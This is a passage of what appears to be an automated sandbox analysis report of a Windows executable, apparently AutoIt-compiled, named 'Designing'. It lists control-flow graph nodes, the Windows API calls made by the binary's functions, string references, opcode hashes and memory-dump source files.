1166->1168 1167->1143 1168->1135 1169 b55780 1168->1169 1169->1165
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                              • String ID:
                                              • API String ID: 1559183368-0
                                              • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                              • Instruction ID: 9346836fd474bfb031773a9f672b08e7738b85926e1d5efe42d17e9471e55ad0
                                              • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                              • Instruction Fuzzy Hash: D7518E30A00B45DBDB349EA988A07AE77E5EF48323F2487E9FC25962D0D7709D599B40

                                              Control-flow Graph

                                              control_flow_graph 1170 b352b0-b352c0 1171 b352c6-b352cd 1170->1171 1172 b6df28-b6df2f 1170->1172 1173 b352d3-b352ea PeekMessageW 1171->1173 1174 b6df3a-b6df41 1171->1174 1175 b6df35 1172->1175 1176 b3530c 1172->1176 1177 b35313-b35317 1173->1177 1178 b352ec-b352f4 1173->1178 1174->1176 1179 b6df47 1174->1179 1175->1174 1180 b3530e-b35312 1176->1180 1183 b6df95-b6df9c 1177->1183 1184 b3531d-b35326 1177->1184 1181 b352fa-b35306 1178->1181 1182 b6dfab-b6dfbc 1178->1182 1187 b6df4c-b6df52 1179->1187 1185 b35368-b3536d 1181->1185 1186 b35308-b3530a 1181->1186 1183->1182 1184->1187 1188 b3532c-b3533c call b3359e 1184->1188 1185->1180 1186->1176 1189 b3536f-b35374 1186->1189 1190 b6df86 1187->1190 1191 b6df54-b6df60 1187->1191 1196 b35352-b35366 TranslateMessage DispatchMessageW 1188->1196 1197 b3533e-b3534e PeekMessageW 1188->1197 1189->1180 1190->1183 1191->1190 1193 b6df62-b6df66 1191->1193 1193->1190 1195 b6df68-b6df7b TranslateAcceleratorW 1193->1195 1195->1197 1198 b6df81 1195->1198 1196->1197 1197->1178 1199 b35350 1197->1199 1198->1188 1199->1177
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B352E6
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B3534A
                                              • TranslateMessage.USER32(?), ref: 00B35356
                                              • DispatchMessageW.USER32(?), ref: 00B35360
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Message$Peek$DispatchTranslate
                                              • String ID:
                                              • API String ID: 1795658109-0
                                              • Opcode ID: 803d540ec17939db3b8e618d6ebe8274765ead10bfa43ea1c743ff8fef185391
                                              • Instruction ID: de41712886ad2655098902e6ea3608d8a9d439dffd21df8c5a7cfb82ebed264f
                                              • Opcode Fuzzy Hash: 803d540ec17939db3b8e618d6ebe8274765ead10bfa43ea1c743ff8fef185391
                                              • Instruction Fuzzy Hash: A9310630A487059BEB309B64DC84FBA77E8DB01344F3400EAE423871E1DBB59885D755
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00B31275,SwapMouseButtons,00000004,?), ref: 00B312A8
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00B31275,SwapMouseButtons,00000004,?), ref: 00B312C9
                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00B31275,SwapMouseButtons,00000004,?), ref: 00B312EB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 82801f2388084ae1375d3d031684f8d1e0e61231269a79b31816efe681b9bbe4
                                              • Instruction ID: f5a7ee58a99652b525eac4388ad4b47edf0f8d06ec289afa1b268d8e953390fe
                                              • Opcode Fuzzy Hash: 82801f2388084ae1375d3d031684f8d1e0e61231269a79b31816efe681b9bbe4
                                              • Instruction Fuzzy Hash: 8C111875514208FFDB208FA8DC84EAFBBECEF05741F204999E805D7110D6719E4097A4
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00BC2C4C), ref: 00B93F57
                                              • GetLastError.KERNEL32 ref: 00B93F66
                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00B93F75
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BC2C4C), ref: 00B93FD2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: bfb0e539e563ec3e1ac3dcd1e3e0bceadc0ed81bd47ce7cfffc7b185a57762cf
                                              • Instruction ID: 48df35d0588b89ddb3e5bf4a4037729c6edae3a8bebbfaabf9eb504a6f6d9c95
                                              • Opcode Fuzzy Hash: bfb0e539e563ec3e1ac3dcd1e3e0bceadc0ed81bd47ce7cfffc7b185a57762cf
                                              • Instruction Fuzzy Hash: 6E2162709083019F8B10EF28D885A6FB7F4FE59764F104AADF495C72A2DB31DA46CB52
                                              APIs
                                              • _memset.LIBCMT ref: 00B45B58
                                                • Part of subcall function 00B456F8: _memset.LIBCMT ref: 00B45787
                                                • Part of subcall function 00B456F8: _wcscpy.LIBCMT ref: 00B457DB
                                                • Part of subcall function 00B456F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B457EB
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00B45BAD
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B45BBC
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B80D7C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                              • String ID:
                                              • API String ID: 1378193009-0
                                              • Opcode ID: a65e0a1159c7de7cf8cd493814e7cd2ae1275b7df4de355a319c419f6f7a8f0e
                                              • Instruction ID: 05f692aa6b1bd38bcb1544f4b3e0b9995f8320fc4ca6e31c01338cde39829d52
                                              • Opcode Fuzzy Hash: a65e0a1159c7de7cf8cd493814e7cd2ae1275b7df4de355a319c419f6f7a8f0e
                                              • Instruction Fuzzy Hash: E921F870504B849FE772AB24C895FEABBECDF05304F0404DDE69957292C7746A88DB41
                                              APIs
                                                • Part of subcall function 00B449C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00B427AF,?,00000001), ref: 00B449F4
                                              • _free.LIBCMT ref: 00B7FB04
                                              • _free.LIBCMT ref: 00B7FB4B
                                                • Part of subcall function 00B429BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B42ADF
                                              Strings
                                              • Bad directive syntax error, xrefs: 00B7FB33
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                              • String ID: Bad directive syntax error
                                              • API String ID: 2861923089-2118420937
                                              • Opcode ID: f128ce6c5afa5c2b6730837f580526e4062b79b7b83eccc6bb25444c7769373f
                                              • Instruction ID: 42ca381a99540e1cb06833daf05ea13e5606b977c6900434e3c315338651825c
                                              • Opcode Fuzzy Hash: f128ce6c5afa5c2b6730837f580526e4062b79b7b83eccc6bb25444c7769373f
                                              • Instruction Fuzzy Hash: 1B914F7191021AAFCF14EFA4C891AFDB7F4FF05310F1485A9F829AB2A1DB309A45DB54
                                              APIs
                                                • Part of subcall function 00B44AB2: __fread_nolock.LIBCMT ref: 00B44AD0
                                              • _wcscmp.LIBCMT ref: 00B99DE1
                                              • _wcscmp.LIBCMT ref: 00B99DF4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _wcscmp$__fread_nolock
                                              • String ID: FILE
                                              • API String ID: 4029003684-3121273764
                                              APIs
                                              • _memset.LIBCMT ref: 00B8032B
                                              • GetOpenFileNameW.COMDLG32(?), ref: 00B80375
                                                • Part of subcall function 00B50284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B42A58,?,00008000), ref: 00B502A4
                                                • Part of subcall function 00B509C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B509E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen_memset
                                              • String ID: X
                                              • API String ID: 3777226403-3081909835
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                                • Part of subcall function 00B4FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BB4186,00000001,00BC0980), ref: 00B4FFA7
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B3AD08
                                              • OleInitialize.OLE32(00000000), ref: 00B3AD85
                                              • CloseHandle.KERNEL32(00000000), ref: 00B72F56
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                              • String ID:
                                              • API String ID: 3815369404-0
                                              APIs
                                              • _memset.LIBCMT ref: 00B459F9
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B45A9E
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B45ABB
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$_memset
                                              • String ID:
                                              • API String ID: 1505330794-0
                                              APIs
                                              • __FF_MSGBANNER.LIBCMT ref: 00B55953
                                                • Part of subcall function 00B5A39B: __NMSG_WRITE.LIBCMT ref: 00B5A3C2
                                                • Part of subcall function 00B5A39B: __NMSG_WRITE.LIBCMT ref: 00B5A3CC
                                              • __NMSG_WRITE.LIBCMT ref: 00B5595A
                                                • Part of subcall function 00B5A3F8: GetModuleFileNameW.KERNEL32(00000000,00BF53BA,00000104,00000004,00000001,00B51003), ref: 00B5A48A
                                                • Part of subcall function 00B5A3F8: ___crtMessageBoxW.LIBCMT ref: 00B5A538
                                                • Part of subcall function 00B532CF: ___crtCorExitProcess.LIBCMT ref: 00B532D5
                                                • Part of subcall function 00B532CF: ExitProcess.KERNEL32 ref: 00B532DE
                                                • Part of subcall function 00B58D58: __getptd_noexit.LIBCMT ref: 00B58D58
                                              • RtlAllocateHeap.NTDLL(01930000,00000000,00000001,?,00000004,?,?,00B51003,?), ref: 00B5597F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                              • String ID:
                                              • API String ID: 1372826849-0
                                              APIs
                                              • _free.LIBCMT ref: 00B992D6
                                                • Part of subcall function 00B52F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00B59C54,00000000,00B58D5D,00B559C3), ref: 00B52F99
                                                • Part of subcall function 00B52F85: GetLastError.KERNEL32(00000000,?,00B59C54,00000000,00B58D5D,00B559C3), ref: 00B52FAB
                                              • _free.LIBCMT ref: 00B992E7
                                              • _free.LIBCMT ref: 00B992F9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CALL
                                              • API String ID: 0-4196123274
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: EA06
                                              • API String ID: 4104443479-3962188686
                                              APIs
                                              • _strcat.LIBCMT ref: 00BAE20C
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • _wcscpy.LIBCMT ref: 00BAE29B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __itow__swprintf_strcat_wcscpy
                                              • String ID:
                                              • API String ID: 1012013722-0
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE ref: 00B50ED5
                                              • SetErrorMode.KERNELBASE ref: 00B50EE7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ChangeCloseErrorFindModeNotification
                                              • String ID:
                                              • API String ID: 1298299968-0
                                              APIs
                                              • IsThemeActive.UXTHEME ref: 00B45FEF
                                                • Part of subcall function 00B5359C: __lock.LIBCMT ref: 00B535A2
                                                • Part of subcall function 00B5359C: DecodePointer.KERNEL32(00000001,?,00B46004,00B88892), ref: 00B535AE
                                                • Part of subcall function 00B5359C: EncodePointer.KERNEL32(?,?,00B46004,00B88892), ref: 00B535B9
                                                • Part of subcall function 00B45F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B45F18
                                                • Part of subcall function 00B45F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B45F2D
                                                • Part of subcall function 00B45240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B4526C
                                                • Part of subcall function 00B45240: IsDebuggerPresent.KERNEL32 ref: 00B4527E
                                                • Part of subcall function 00B45240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00B452E6
                                                • Part of subcall function 00B45240: SetCurrentDirectoryW.KERNEL32(?), ref: 00B45366
                                              • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00B4602F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                              • String ID:
                                              • API String ID: 1438897964-0
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00B43E72,?,?,?,00000000), ref: 00B44327
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00B43E72,?,?,?,00000000), ref: 00B80717
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              APIs
                                                • Part of subcall function 00B5593C: __FF_MSGBANNER.LIBCMT ref: 00B55953
                                                • Part of subcall function 00B5593C: __NMSG_WRITE.LIBCMT ref: 00B5595A
                                                • Part of subcall function 00B5593C: RtlAllocateHeap.NTDLL(01930000,00000000,00000001,?,00000004,?,?,00B51003,?), ref: 00B5597F
                                              • std::exception::exception.LIBCMT ref: 00B5101C
                                              • __CxxThrowException@8.LIBCMT ref: 00B51031
                                                • Part of subcall function 00B587CB: RaiseException.KERNEL32(?,?,?,00BECAF8,?,?,?,?,?,00B51036,?,00BECAF8,?,00000001), ref: 00B58820
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 3902256705-0
